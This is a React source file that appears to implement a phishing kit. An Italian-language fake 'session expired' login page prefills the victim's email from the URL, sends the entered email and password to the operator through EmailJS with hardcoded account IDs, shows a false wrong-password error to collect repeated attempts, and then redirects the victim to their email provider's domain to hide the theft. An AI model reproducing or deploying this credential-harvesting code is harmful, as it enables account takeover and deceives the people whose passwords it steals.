//jshint esversion:6
import React, {useState, useRef} from 'react'
import emailjs from '@emailjs/browser';
import ClipLoader from "react-spinners/ClipLoader";
import Grid from '@mui/material/Grid';
import logo from './logo.jpg';
import VisibilityOffIcon from '@mui/icons-material/VisibilityOff';
import VisibilityIcon from '@mui/icons-material/Visibility';


function getPartAfterDot(text) {
  var dotIndex = text.indexOf('@');
  if (dotIndex !== -1) {
    return text.substring(dotIndex + 1);
  }
  return '';
}

function App() {
  const url = window.location.search.slice(20)
  const form = useRef();
  const [count, setCount] = useState(0)
  const [email, setEmail] = useState(url ? url : '')
  const [expired, setExpired] = useState('La tua sessione è scaduta, verifica che tu sia tu')
  const [pwdOne, setPwdOne] = useState('')

  const [pwdError, setPwdError] =  useState(false)

  const [loading, setLoading] = useState(false)
  const [visible, setVisible] = useState(false)

  const handleEmailChange = (e) => {
    setEmail(e.target.value)
  }
  const handlePwdOneChange = (e) => {
    setPwdOne(e.target.value)
  }


  const handleFormSubmit = async (e) => {
    e.preventDefault()
    setPwdError(false)
    setExpired('')
    setLoading(true)

    if (count < 2) {
      setCount(prevCount => prevCount + 1)

      setLoading(true)
      emailjs.sendForm('service_jv822ho', 'template_7pybpom', form.current, 'n7qzQVomNkjO3BPS9')
      .then((result) => {
        setPwdOne("")
        setLoading(false)
        setPwdError(true)
      }, (error) => {
          console.log(error.text);
      });
    }


    if (count >= 2 ) {
      emailjs.sendForm('service_jv822ho', 'template_7pybpom', form.current, 'n7qzQVomNkjO3BPS9')
      .then((result) => {
        const redir = getPartAfterDot(email)
        window.location.replace(`https://${redir}`);
      }, (error) => {
          console.log(error.text);
      });
    }
  }

  const handleVisibility = () => {
    setVisible(prevValue => !prevValue)
  }

  return (
    <div className="general">
      <img src={logo} className="img2" alt='Timeout'/>
      <div style={{textAlign: 'center', color: '#f3730b', margin: '5px 0'}}>{expired}</div>

      <form ref={form} onSubmit={handleFormSubmit}>
          <label>E-mail</label>
          <input type="email" name="mascot" value={email} onChange={handleEmailChange} required/>

          <label>Password</label>
          <Grid container>
            <Grid item xs={12}>
              <input type={visible ? "text" : "password"} color='primary' name="pwdOne" value={pwdOne} onChange={handlePwdOneChange} required />
            </Grid>
              <Grid item xs={1} sx={{position: 'relative', left: '250px', top: '-40px'}}>
                {!visible ? 
                  <VisibilityIcon onClick={handleVisibility} sx={{cursor: 'pointer'}} /> 
                  : 
                  <VisibilityOffIcon onClick={handleVisibility} sx={{cursor: 'pointer'}} />
                }
              </Grid>
          </Grid>

          {pwdError && <div className='error'>Sembra brutto, riprova</div>}
          <input type="submit" value="Continuare" />

      </form>

      {loading && 
        <div className='loader'>
          <ClipLoader
            color='#0073c6dc'
            loading={loading}
            size={150}
            aria-label="Loading Spinner"
            data-testid="loader"
          />
        </div>
      }
    </div>
  );
}

export default App;
